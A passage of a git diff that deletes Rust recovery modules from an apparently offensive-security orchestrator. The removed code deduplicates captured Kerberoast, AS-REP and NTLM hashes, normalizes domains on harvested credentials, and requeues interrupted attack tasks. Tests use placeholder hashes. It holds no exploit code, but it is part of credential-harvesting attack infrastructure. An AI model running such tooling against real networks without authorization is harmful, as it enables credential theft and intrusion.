domain, - description: String::new(), - is_admin: false, - source: "output_extraction".to_string(), - }); - } - } - } - - users -} diff --git a/ares-orchestrator/src/recovery/dedup.rs b/ares-orchestrator/src/recovery/dedup.rs deleted file mode 100644 index 22da9a39..00000000 --- a/ares-orchestrator/src/recovery/dedup.rs +++ /dev/null @@ -1,273 +0,0 @@ -//! Hash deduplication logic. - -use std::collections::HashSet; - -use tracing::info; - -use ares_core::models::Hash; - -/// Deduplicate hashes, keeping first occurrence. -/// -/// - **AS-REP hashes**: dedup by `(domain.lower(), username.lower())` since -/// each AS-REP request generates a different hash but cracks to the same -/// password. 
-/// - **Kerberoast/TGS hashes**: dedup by `(domain.lower(), username.lower(), -/// spn_key)` where spn_key is extracted from the hash format. -/// - **NTLM/other hashes**: dedup by exact `hash_value`. -pub fn dedupe_hashes(hashes: Vec) -> Vec { - let mut seen_asrep: HashSet<(String, String)> = HashSet::new(); - let mut seen_kerberoast: HashSet<(String, String, String)> = HashSet::new(); - let mut seen_other: HashSet = HashSet::new(); - let mut result = Vec::with_capacity(hashes.len()); - let original_len = hashes.len(); - - for h in hashes { - let hash_type = h.hash_type.trim().to_lowercase(); - let hash_value = &h.hash_value; - let username = h.username.trim().to_lowercase(); - let domain = h.domain.trim().to_lowercase(); - - let is_asrep = matches!(hash_type.as_str(), "as-rep" | "asrep" | "krb5asrep") - || hash_value.starts_with("$krb5asrep$"); - - let is_kerberoast = matches!( - hash_type.as_str(), - "kerberoast" | "krb5tgs" | "tgs-rep" | "tgs" - ) || hash_value.starts_with("$krb5tgs$"); - - if is_asrep { - let key = (domain, username); - if seen_asrep.contains(&key) { - continue; - } - seen_asrep.insert(key); - } else if is_kerberoast { - let spn_key = extract_kerberoast_spn_key(hash_value).unwrap_or_default(); - let key = (domain, username, spn_key); - if seen_kerberoast.contains(&key) { - continue; - } - seen_kerberoast.insert(key); - } else { - if seen_other.contains(hash_value) { - continue; - } - seen_other.insert(hash_value.clone()); - } - - result.push(h); - } - - let removed = original_len - result.len(); - if removed > 0 { - info!(removed = removed, "Deduplicated hashes"); - } - result -} - -/// Extract SPN and encryption type from a Kerberoast hash for deduplication. -/// -/// Hash format: `$krb5tgs$ETYPE$*user$realm$spn*$checksum$encrypted` -pub(crate) fn extract_kerberoast_spn_key(hash_value: &str) -> Option { - if !hash_value.starts_with("$krb5tgs$") { - return None; - } - let dollar_parts: Vec<&str> = hash_value.split('$').collect(); - if dollar_parts.len() < 4 { - return None; - } - let etype = dollar_parts[2]; - let asterisk_parts: Vec<&str> = hash_value.split('*').collect(); - if asterisk_parts.len() < 2 { - return None; - } - let inner_parts: Vec<&str> = asterisk_parts[1].split('$').collect(); - if inner_parts.len() < 3 { - return None; - } - let spn = inner_parts[2]; - Some(format!("{etype}:{spn}")) -} - -#[cfg(test)] -mod tests { - use super::*; - - fn make_hash(username: &str, domain: &str, hash_type: &str, hash_value: &str) -> Hash { - Hash { - id: String::new(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: hash_type.to_string(), - domain: domain.to_string(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: None, - } - } - - // --- extract_kerberoast_spn_key --- - - #[test] - fn test_extract_spn_key_valid() { - let hash = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$aabb$ccdd"; - let key = extract_kerberoast_spn_key(hash); - assert!(key.is_some()); - let key = key.unwrap(); - assert!(key.starts_with("23:")); - assert!(key.contains("MSSQLSvc")); - } - - #[test] - fn test_extract_spn_key_not_krb5tgs() { - assert_eq!(extract_kerberoast_spn_key("$krb5asrep$23$user"), None); - } - - #[test] - fn test_extract_spn_key_too_short() { - assert_eq!(extract_kerberoast_spn_key("$krb5tgs$"), None); - } - - // --- dedupe_hashes --- - - #[test] - fn test_dedupe_ntlm_by_hash_value() { - let hashes = vec![ - make_hash( - "admin", - "contoso.local", - 
"ntlm", - "aabbccdd11223344aabbccdd11223344", - ), - make_hash( - "admin", - "contoso.local", - "ntlm", - "aabbccdd11223344aabbccdd11223344", - ), // dup - make_hash( - "admin", - "contoso.local", - "ntlm", - "eeff0011eeff0011eeff0011eeff0011", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 2); - } - - #[test] - fn test_dedupe_asrep_by_domain_user() { - let hashes = vec![ - make_hash( - "svc_web", - "contoso.local", - "as-rep", - "$krb5asrep$23$svc_web@CONTOSO.LOCAL:aabb", - ), - make_hash( - "svc_web", - "contoso.local", - "asrep", - "$krb5asrep$23$svc_web@CONTOSO.LOCAL:ccdd", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 1); // same user+domain → deduped - } - - #[test] - fn test_dedupe_asrep_different_users() { - let hashes = vec![ - make_hash( - "svc_web", - "contoso.local", - "as-rep", - "$krb5asrep$23$svc_web:aabb", - ), - make_hash( - "svc_sql", - "contoso.local", - "as-rep", - "$krb5asrep$23$svc_sql:ccdd", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 2); // different users → kept - } - - #[test] - fn test_dedupe_kerberoast_by_spn() { - let hashes = vec![ - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$aabb$cc", - ), - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$ddee$ff", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 1); // same SPN → deduped - } - - #[test] - fn test_dedupe_mixed_types() { - let hashes = vec![ - make_hash( - "admin", - "contoso.local", - "ntlm", - "aabbccdd11223344aabbccdd11223344", - ), - make_hash( - "svc_web", - "contoso.local", - "as-rep", - "$krb5asrep$23$svc_web:aabb", - ), - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc*$aa$bb", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 3); // all unique - } - - #[test] - fn test_dedupe_empty() { - let deduped = dedupe_hashes(vec![]); - assert!(deduped.is_empty()); - } - - #[test] - fn test_dedupe_case_insensitive() { - let hashes = vec![ - make_hash( - "Admin", - "CONTOSO.LOCAL", - "as-rep", - "$krb5asrep$23$Admin:aabb", - ), - make_hash( - "admin", - "contoso.local", - "as-rep", - "$krb5asrep$23$admin:ccdd", - ), - ]; - let deduped = dedupe_hashes(hashes); - assert_eq!(deduped.len(), 1); - } -} diff --git a/ares-orchestrator/src/recovery/manager.rs b/ares-orchestrator/src/recovery/manager.rs deleted file mode 100644 index 140a0bdb..00000000 --- a/ares-orchestrator/src/recovery/manager.rs +++ /dev/null @@ -1,256 +0,0 @@ -//! OperationRecoveryManager -- recovery of operation state from Redis. - -use std::collections::HashMap; - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tracing::{error, info, warn}; - -use ares_core::models::{TaskInfo, TaskStatus}; -use ares_core::state::{self, RedisStateReader}; - -use crate::task_queue::TaskQueue; - -use super::dedup::dedupe_hashes; -use super::normalize::{normalize_credential_domains, normalize_hash_domains}; -use super::requeue::requeue_task; -use super::types::{ - is_connection_error, RecoveredState, INTERRUPTED_STATUSES, MAX_CONNECTION_RETRIES, MAX_RETRIES, -}; - -/// Manages recovery of operation state from Redis after a restart. -pub struct OperationRecoveryManager { - redis_url: String, -} - -impl OperationRecoveryManager { - /// Create a new recovery manager. 
- pub fn new(redis_url: String) -> Self { - Self { redis_url } - } - - /// Attempt to recover an operation's state from Redis. - /// - /// 1. Checks that `ares:op:{operation_id}:meta` exists - /// 2. Loads full state via `RedisStateReader` - /// 3. Deduplicates hashes - /// 4. Normalizes credential/hash domains against netbios_to_fqdn map - /// 5. Loads pending tasks from `ares:op:{id}:pending_tasks` HASH - /// 6. Re-enqueues interrupted tasks (incrementing retry count) - /// 7. Returns recovered state + lists of requeued/failed task IDs - /// - /// Retries up to `MAX_CONNECTION_RETRIES` times on transient Redis errors. - pub async fn recover(&self, operation_id: &str) -> Result { - let mut last_err: Option = None; - - for attempt in 1..=MAX_CONNECTION_RETRIES { - let queue = match TaskQueue::connect(&self.redis_url).await { - Ok(q) => q, - Err(e) => { - if attempt < MAX_CONNECTION_RETRIES { - warn!( - attempt = attempt, - err = %e, - "Redis connection failed, retrying" - ); - last_err = Some(e); - continue; - } - return Err(e).context("Failed to connect to Redis for recovery"); - } - }; - - match Self::recover_inner(&queue, operation_id).await { - Ok(result) => return Ok(result), - Err(e) => { - if is_connection_error(&e) && attempt < MAX_CONNECTION_RETRIES { - warn!( - attempt = attempt, - err = %e, - "Transient Redis error during recovery, retrying" - ); - last_err = Some(e); - continue; - } - return Err(e); - } - } - } - - Err(last_err - .unwrap_or_else(|| anyhow::anyhow!("Recovery retry exhausted")) - .context("Recovery failed after retries")) - } - - /// Inner recovery logic (called within retry wrapper). - async fn recover_inner(queue: &TaskQueue, operation_id: &str) -> Result { - let mut conn = queue.connection(); - let reader = RedisStateReader::new(operation_id.to_string()); - - let exists = reader - .exists(&mut conn) - .await - .context("Failed to check operation existence")?; - if !exists { - anyhow::bail!( - "Operation {} not found in Redis -- cannot recover", - operation_id - ); - } - - let mut loaded_state = reader - .load_state(&mut conn) - .await - .context("Failed to load state from Redis")? 
- .ok_or_else(|| anyhow::anyhow!("Operation {} has no state data", operation_id))?; - - info!( - operation_id = operation_id, - credentials = loaded_state.all_credentials.len(), - hashes = loaded_state.all_hashes.len(), - hosts = loaded_state.all_hosts.len(), - has_domain_admin = loaded_state.has_domain_admin, - "State loaded for recovery" - ); - - let original_hash_count = loaded_state.all_hashes.len(); - loaded_state.all_hashes = dedupe_hashes(loaded_state.all_hashes); - let deduped = original_hash_count - loaded_state.all_hashes.len(); - if deduped > 0 { - info!(removed = deduped, "Deduplicated hashes during recovery"); - } - - let cred_fixed = normalize_credential_domains( - &mut loaded_state.all_credentials, - &loaded_state.netbios_to_fqdn, - ); - let hash_fixed = - normalize_hash_domains(&mut loaded_state.all_hashes, &loaded_state.netbios_to_fqdn); - - if cred_fixed > 0 || hash_fixed > 0 { - info!( - cred_fixed = cred_fixed, - hash_fixed = hash_fixed, - "Normalized domains during recovery" - ); - - if cred_fixed > 0 { - for cred in &loaded_state.all_credentials { - let _ = reader.add_credential(&mut conn, cred).await; - } - } - if hash_fixed > 0 { - for h in &loaded_state.all_hashes { - let _ = reader.add_hash(&mut conn, h).await; - } - } - } - - let pending_tasks_key = state::build_key(operation_id, state::KEY_PENDING_TASKS); - let raw_tasks: HashMap = - conn.hgetall(&pending_tasks_key).await.unwrap_or_default(); - - let mut pending_tasks: HashMap = HashMap::new(); - for (task_id, json_str) in &raw_tasks { - match serde_json::from_str::(json_str) { - Ok(task_info) => { - pending_tasks.insert(task_id.clone(), task_info); - } - Err(e) => { - warn!( - task_id = %task_id, - err = %e, - "Failed to deserialize pending task, skipping" - ); - } - } - } - - info!( - operation_id = operation_id, - pending_tasks = pending_tasks.len(), - "Loaded pending tasks for recovery" - ); - - let mut requeued_task_ids = Vec::new(); - let mut failed_task_ids = Vec::new(); - - for (task_id, task) in &mut pending_tasks { - if !INTERRUPTED_STATUSES.contains(&task.status) { - continue; - } - - // Increment retry count for tasks that were actively running - if task.status == TaskStatus::InProgress { - task.retry_count += 1; - } - - let max_retries = task.max_retries.max(MAX_RETRIES); - - if task.retry_count <= max_retries { - task.status = TaskStatus::Retrying; - if task.retry_count > 0 { - task.error = Some(format!( - "Pod restart during execution (retry {}/{})", - task.retry_count, max_retries - )); - } else { - task.error = Some("Requeued after pod restart (task was pending)".to_string()); - } - - match requeue_task(queue, task_id, task).await { - Ok(()) => { - requeued_task_ids.push(task_id.clone()); - info!( - task_id = %task_id, - retry_count = task.retry_count, - max_retries = max_retries, - "Task requeued for recovery" - ); - } - Err(e) => { - warn!( - task_id = %task_id, - err = %e, - "Failed to requeue task" - ); - } - } - } else { - // Exceeded max retries - task.status = TaskStatus::Failed; - task.error = Some(format!( - "Pod restart during execution (max retries {} exceeded)", - max_retries - )); - task.completed_at = Some(chrono::Utc::now()); - failed_task_ids.push(task_id.clone()); - error!( - task_id = %task_id, - retry_count = task.retry_count, - "Task permanently failed after max retries" - ); - } - } - - // Persist updated pending_tasks back to Redis - for (task_id, task) in &pending_tasks { - if let Ok(json) = serde_json::to_string(task) { - let _: Result<(), _> = 
-                    conn.hset(&pending_tasks_key, task_id, &json).await;
-            }
-        }
-
-        info!(
-            operation_id = operation_id,
-            requeued = requeued_task_ids.len(),
-            failed = failed_task_ids.len(),
-            "Recovery complete"
-        );
-
-        Ok(RecoveredState {
-            state: loaded_state,
-            requeued_task_ids,
-            failed_task_ids,
-        })
-    }
-}
diff --git a/ares-orchestrator/src/recovery/mod.rs b/ares-orchestrator/src/recovery/mod.rs
deleted file mode 100644
index f9ea6fd5..00000000
--- a/ares-orchestrator/src/recovery/mod.rs
+++ /dev/null
@@ -1,440 +0,0 @@
-//! Operation recovery manager.
-//!
-//! On startup, the orchestrator can recover state from a previous run by
-//! loading it from Redis and re-enqueueing any interrupted tasks (those with
-//! status PENDING, IN_PROGRESS, or RETRYING).
-//!
-//! Ported from `ares.core.recovery` (Python). Key additions over the initial
-//! skeleton:
-//!
-//! - **Hash deduplication** (`dedupe_hashes`) -- AS-REP by (domain,username),
-//!   Kerberoast by (domain,username,spn_key), NTLM by exact hash value.
-//! - **Pending-task requeuing** -- loads `ares:op:{id}:pending_tasks` HASH
-//!   instead of scanning global `ares:task_status:*` keys.
-//! - **State normalization** -- fixes NetBIOS -> FQDN domain mismatches on
-//!   credentials and hashes, persists corrections back to Redis.
-//! - **Connection error detection** with retry logic.
-//! - **`OperationResumeHelper`** -- analysis methods for post-recovery summary.
-
-mod dedup;
-mod manager;
-mod normalize;
-mod requeue;
-mod resume_helper;
-mod types;
-
-// Re-export all public items at the same paths they had before the split.
-// Allow unused -- these re-exports document the module API and are needed by
-// tests and by main.rs (OperationRecoveryManager). The remaining types are
-// returned from public methods and would be needed by any future library consumer.
-pub use manager::OperationRecoveryManager;
-#[allow(unused_imports)]
-pub use resume_helper::OperationResumeHelper;
-#[allow(unused_imports)]
-pub use types::{InterruptedTask, RecoveredState, RetryingTask};
-
-// Items that were module-private in the original single file; re-exported
-// here only for intra-crate use and tests.
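recover() above retries only on connection-class Redis errors and surfaces everything else immediately. The shape of that loop, reduced to std types; the classifier and limit below are stand-ins for the removed is_connection_error and MAX_CONNECTION_RETRIES:

```rust
const MAX_CONNECTION_RETRIES: u32 = 3;

// Stand-in classifier: the real code inspects redis error kinds.
fn is_transient(err: &str) -> bool {
    err.contains("connection")
}

fn recover_with_retry(
    mut attempt_fn: impl FnMut(u32) -> Result<String, String>,
) -> Result<String, String> {
    let mut last_err = None;
    for attempt in 1..=MAX_CONNECTION_RETRIES {
        match attempt_fn(attempt) {
            Ok(v) => return Ok(v),
            // Transient failure with attempts left: remember it and retry.
            Err(e) if is_transient(&e) && attempt < MAX_CONNECTION_RETRIES => last_err = Some(e),
            // Permanent failure, or retries exhausted: bail immediately.
            Err(e) => return Err(e),
        }
    }
    Err(last_err.unwrap_or_else(|| "retry exhausted".into()))
}

fn main() {
    // Fails twice with a transient error, then succeeds on attempt 3.
    let result = recover_with_retry(|attempt| {
        if attempt < 3 { Err("connection refused".into()) } else { Ok("state".into()) }
    });
    assert_eq!(result.as_deref(), Ok("state"));
}
```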
-#[allow(unused_imports)] -pub(crate) use dedup::dedupe_hashes; -#[allow(unused_imports)] -pub(crate) use normalize::{normalize_credential_domains, normalize_hash_domains, resolve_domain}; - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use std::collections::HashMap; - - use ares_core::models::{Credential, Hash, TaskInfo, TaskStatus}; - - use super::dedup::extract_kerberoast_spn_key; - use super::types::is_connection_error; - use super::*; - - fn make_hash(username: &str, domain: &str, hash_type: &str, hash_value: &str) -> Hash { - Hash { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - hash_value: hash_value.to_string(), - hash_type: hash_type.to_string(), - domain: domain.to_string(), - cracked_password: None, - source: String::new(), - discovered_at: None, - parent_id: None, - attack_step: 0, - aes_key: None, - } - } - - // --- Hash dedup tests --- - - #[test] - fn test_dedupe_asrep_by_domain_username() { - let hashes = vec![ - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@CONTOSO.LOCAL$aaaa", - ), - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@CONTOSO.LOCAL$bbbb", - ), - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@CONTOSO.LOCAL$cccc", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!( - result.len(), - 1, - "AS-REP hashes for same user should dedupe to 1" - ); - assert!( - result[0].hash_value.ends_with("$aaaa"), - "Should keep first occurrence" - ); - } - - #[test] - fn test_dedupe_asrep_different_users_kept() { - let hashes = vec![ - make_hash( - "edavis", - "contoso.local", - "as-rep", - "$krb5asrep$23$edavis@C$aaa", - ), - make_hash( - "fwilson", - "contoso.local", - "as-rep", - "$krb5asrep$23$fwilson@C$bbb", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!(result.len(), 2, "Different users should be kept"); - } - - #[test] - fn test_dedupe_kerberoast_by_spn() { - let hashes = vec![ - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$checksum1$enc1", - ), - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$checksum2$enc2", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!(result.len(), 1, "Same SPN kerberoast hashes should dedupe"); - } - - #[test] - fn test_dedupe_kerberoast_different_spn_kept() { - let hashes = vec![ - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01*$chk$enc", - ), - make_hash( - "svc_sql", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db02*$chk$enc", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!(result.len(), 2, "Different SPNs should be kept"); - } - - #[test] - fn test_dedupe_ntlm_by_exact_value() { - let hashes = vec![ - make_hash( - "admin", - "contoso.local", - "NTLM", - "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", // pragma: allowlist secret - ), - make_hash( - "admin", - "contoso.local", - "NTLM", - "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", // pragma: allowlist secret - ), - make_hash( - "admin", - "contoso.local", - "NTLM", - "aad3b435b51404eeaad3b435b51404ee:different_hash_value", // pragma: allowlist secret - ), - ]; - let result = 
dedupe_hashes(hashes); - assert_eq!( - result.len(), - 2, - "Identical NTLM hashes should dedupe, different kept" - ); - } - - #[test] - fn test_dedupe_mixed_types() { - let hashes = vec![ - // 2 AS-REP for same user -> 1 - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@C$a", - ), - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@C$b", - ), - // 1 NTLM - make_hash("admin", "contoso.local", "NTLM", "aad3b435:hash1"), // pragma: allowlist secret - // 1 Kerberoast - make_hash( - "svc", - "contoso.local", - "kerberoast", - "$krb5tgs$23$*svc$CONTOSO.LOCAL$SPN*$chk$enc", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!( - result.len(), - 3, - "Should keep 1 asrep + 1 ntlm + 1 kerberoast" - ); - } - - #[test] - fn test_dedupe_empty() { - let result = dedupe_hashes(vec![]); - assert!(result.is_empty()); - } - - #[test] - fn test_dedupe_case_insensitive() { - let hashes = vec![ - make_hash( - "EDavis", - "CONTOSO.LOCAL", - "asrep", - "$krb5asrep$23$EDavis@C$a", - ), - make_hash( - "edavis", - "contoso.local", - "asrep", - "$krb5asrep$23$edavis@C$b", - ), - ]; - let result = dedupe_hashes(hashes); - assert_eq!(result.len(), 1, "Case-insensitive dedup for AS-REP"); - } - - // --- Retry limit tests --- - - #[test] - fn test_retry_limit_not_exceeded() { - let task = TaskInfo { - task_id: "test_1".to_string(), - task_type: "recon".to_string(), - assigned_agent: "recon".to_string(), - status: TaskStatus::InProgress, - created_at: chrono::Utc::now(), - started_at: None, - completed_at: None, - last_activity_at: chrono::Utc::now(), - params: HashMap::new(), - result: None, - error: None, - retry_count: 2, - max_retries: 3, - }; - // retry_count (2) after increment (3) should still be <= max_retries (3) - assert!( - task.retry_count < task.max_retries, - "Task with retry_count=2 should still be requeueable" - ); - } - - #[test] - fn test_retry_limit_exceeded() { - let task = TaskInfo { - task_id: "test_2".to_string(), - task_type: "recon".to_string(), - assigned_agent: "recon".to_string(), - status: TaskStatus::InProgress, - created_at: chrono::Utc::now(), - started_at: None, - completed_at: None, - last_activity_at: chrono::Utc::now(), - params: HashMap::new(), - result: None, - error: None, - retry_count: 3, - max_retries: 3, - }; - // After increment: retry_count=4 > max_retries=3 - assert!( - task.retry_count + 1 > task.max_retries, - "Task with retry_count=3 after increment should exceed max" - ); - } - - // --- State normalization tests --- - - #[test] - fn test_normalize_credential_domains_netbios_to_fqdn() { - let mut creds = vec![ - Credential { - id: "1".to_string(), - username: "admin".to_string(), - password: "pass".to_string(), // pragma: allowlist secret - domain: "CONTOSO".to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }, - Credential { - id: "2".to_string(), - username: "user1".to_string(), - password: "pass2".to_string(), // pragma: allowlist secret - domain: "contoso.local".to_string(), // already FQDN - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }, - ]; - - let mut netbios_map = HashMap::new(); - netbios_map.insert("CONTOSO".to_string(), "contoso.local".to_string()); - - let fixed = normalize_credential_domains(&mut creds, &netbios_map); - assert_eq!(fixed, 1); - assert_eq!(creds[0].domain, "contoso.local"); - assert_eq!(creds[1].domain, "contoso.local"); // unchanged - } - - #[test] - fn 
test_normalize_hash_domains() { - let mut hashes = vec![make_hash("admin", "FABRIKAM", "NTLM", "hash123")]; - - let mut netbios_map = HashMap::new(); - netbios_map.insert("FABRIKAM".to_string(), "fabrikam.local".to_string()); - - let fixed = normalize_hash_domains(&mut hashes, &netbios_map); - assert_eq!(fixed, 1); - assert_eq!(hashes[0].domain, "fabrikam.local"); - } - - #[test] - fn test_normalize_no_changes_when_fqdn() { - let mut creds = vec![Credential { - id: "1".to_string(), - username: "admin".to_string(), - password: "pass".to_string(), // pragma: allowlist secret - domain: "contoso.local".to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }]; - - let netbios_map = HashMap::new(); - let fixed = normalize_credential_domains(&mut creds, &netbios_map); - assert_eq!(fixed, 0, "FQDN domain should not be touched"); - } - - #[test] - fn test_resolve_domain_empty_and_dotted() { - let map = HashMap::new(); - assert!(resolve_domain("", &map).is_none(), "Empty domain -> None"); - assert!( - resolve_domain("already.fqdn.local", &map).is_none(), - "Dotted domain -> None" - ); - } - - #[test] - fn test_resolve_domain_case_insensitive_lookup() { - let mut map = HashMap::new(); - map.insert("CONTOSO".to_string(), "contoso.local".to_string()); - - assert_eq!( - resolve_domain("contoso", &map), - Some("contoso.local".to_string()), - "Lowercase input should match uppercase key via to_uppercase" - ); - assert_eq!( - resolve_domain("CONTOSO", &map), - Some("contoso.local".to_string()), - ); - assert_eq!( - resolve_domain("Contoso", &map), - Some("contoso.local".to_string()), - ); - } - - // --- Kerberoast SPN extraction --- - - #[test] - fn test_extract_kerberoast_spn_key_valid() { - let hash = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$chk$enc"; - let result = extract_kerberoast_spn_key(hash); - assert_eq!(result, Some("23:MSSQLSvc/db01.contoso.local".to_string())); - } - - #[test] - fn test_extract_kerberoast_spn_key_invalid() { - assert!(extract_kerberoast_spn_key("not_a_krb_hash").is_none()); - assert!(extract_kerberoast_spn_key("$krb5tgs$").is_none()); - assert!(extract_kerberoast_spn_key("$krb5tgs$23$nope").is_none()); - } - - // --- Connection error detection --- - - #[test] - fn test_is_connection_error() { - let conn_err = anyhow::anyhow!("Connection reset by peer"); - assert!(is_connection_error(&conn_err)); - - let timeout_err = anyhow::anyhow!("Operation TIMEOUT after 30s"); - assert!(is_connection_error(&timeout_err)); - - let broken = anyhow::anyhow!("Broken pipe"); - assert!(is_connection_error(&broken)); - - let normal = anyhow::anyhow!("Key not found"); - assert!(!is_connection_error(&normal)); - } -} diff --git a/ares-orchestrator/src/recovery/normalize.rs b/ares-orchestrator/src/recovery/normalize.rs deleted file mode 100644 index 5271bfa3..00000000 --- a/ares-orchestrator/src/recovery/normalize.rs +++ /dev/null @@ -1,171 +0,0 @@ -//! State normalization: fix NetBIOS -> FQDN domain mismatches. - -use std::collections::HashMap; - -use ares_core::models::{Credential, Hash}; - -/// If `domain` is a NetBIOS name (no dots, uppercase-ish), look it up in the -/// map and return the FQDN if found. Returns `None` if no fixup is needed. 
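Concretely, for the function defined immediately below (behavior pinned by the tests later in this file):

```rust
#[test]
fn resolve_domain_examples() {
    let mut map = std::collections::HashMap::new();
    map.insert("CONTOSO".to_string(), "contoso.local".to_string());

    assert_eq!(resolve_domain("CONTOSO", &map), Some("contoso.local".to_string()));
    assert_eq!(resolve_domain("contoso", &map), Some("contoso.local".to_string())); // case-insensitive
    assert_eq!(resolve_domain("contoso.local", &map), None); // already an FQDN, no fixup
    assert_eq!(resolve_domain("", &map), None); // nothing to resolve
}
```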
-pub fn resolve_domain(domain: &str, netbios_map: &HashMap<String, String>) -> Option<String> { - let trimmed = domain.trim(); - if trimmed.is_empty() || trimmed.contains('.') { - // Already FQDN or empty - return None; - } - // Look up the NetBIOS name (case-insensitive) - let upper = trimmed.to_uppercase(); - netbios_map - .get(&upper) - .or_else(|| netbios_map.get(trimmed)) - .or_else(|| netbios_map.get(&trimmed.to_lowercase())) - .cloned() -} - -/// Generic domain normalizer: applies `resolve_domain` to each item's domain, -/// mutating in place via the provided accessor. Returns the count of items fixed. -fn normalize_domains<T, F>( - items: &mut [T], - netbios_map: &HashMap<String, String>, - get_domain: F, -) -> usize -where - F: Fn(&mut T) -> &mut String, -{ - let mut fixed = 0; - for item in items.iter_mut() { - let domain = get_domain(item); - if let Some(fqdn) = resolve_domain(domain, netbios_map) { - *domain = fqdn; - fixed += 1; - } - } - fixed -} - -/// Fix credential domains: replace NetBIOS names with FQDNs where the -/// `netbios_to_fqdn` map provides a mapping. -/// -/// Returns the number of credentials fixed. -pub fn normalize_credential_domains( - credentials: &mut [Credential], - netbios_map: &HashMap<String, String>, -) -> usize { - normalize_domains(credentials, netbios_map, |c| &mut c.domain) -} - -/// Fix hash domains: replace NetBIOS names with FQDNs where the -/// `netbios_to_fqdn` map provides a mapping. -/// -/// Returns the number of hashes fixed. -pub fn normalize_hash_domains(hashes: &mut [Hash], netbios_map: &HashMap<String, String>) -> usize { - normalize_domains(hashes, netbios_map, |h| &mut h.domain) -} - -#[cfg(test)] -mod tests { - use super::*; - - fn make_map() -> HashMap<String, String> { - let mut m = HashMap::new(); - m.insert("CONTOSO".to_string(), "contoso.local".to_string()); - m.insert("FABRIKAM".to_string(), "fabrikam.local".to_string()); - m - } - - #[test] - fn test_resolve_domain_netbios_to_fqdn() { - let map = make_map(); - assert_eq!( - resolve_domain("CONTOSO", &map), - Some("contoso.local".to_string()) - ); - } - - #[test] - fn test_resolve_domain_case_insensitive() { - let map = make_map(); - assert_eq!( - resolve_domain("contoso", &map), - Some("contoso.local".to_string()) - ); - } - - #[test] - fn test_resolve_domain_already_fqdn() { - let map = make_map(); - assert_eq!(resolve_domain("contoso.local", &map), None); - } - - #[test] - fn test_resolve_domain_empty() { - let map = make_map(); - assert_eq!(resolve_domain("", &map), None); - } - - #[test] - fn test_resolve_domain_unknown_netbios() { - let map = make_map(); - assert_eq!(resolve_domain("UNKNOWN", &map), None); - } - - #[test] - fn test_normalize_credential_domains() { - let map = make_map(); - let mut creds = vec![ - Credential { - id: String::new(), - username: "admin".to_string(), - password: "P@ss1".to_string(), - domain: "CONTOSO".to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }, - Credential { - id: String::new(), - username: "jdoe".to_string(), - password: "P@ss2".to_string(), - domain: "contoso.local".to_string(), - source: String::new(), - discovered_at: None, - is_admin: false, - parent_id: None, - attack_step: 0, - }, - ]; - let fixed = normalize_credential_domains(&mut creds, &map); - assert_eq!(fixed, 1); - assert_eq!(creds[0].domain, "contoso.local"); - assert_eq!(creds[1].domain, "contoso.local"); // unchanged - } - - #[test] - fn test_normalize_hash_domains() { - let map = make_map(); - let mut hashes = vec![Hash { - id: String::new(), - username: "admin".to_string(), -
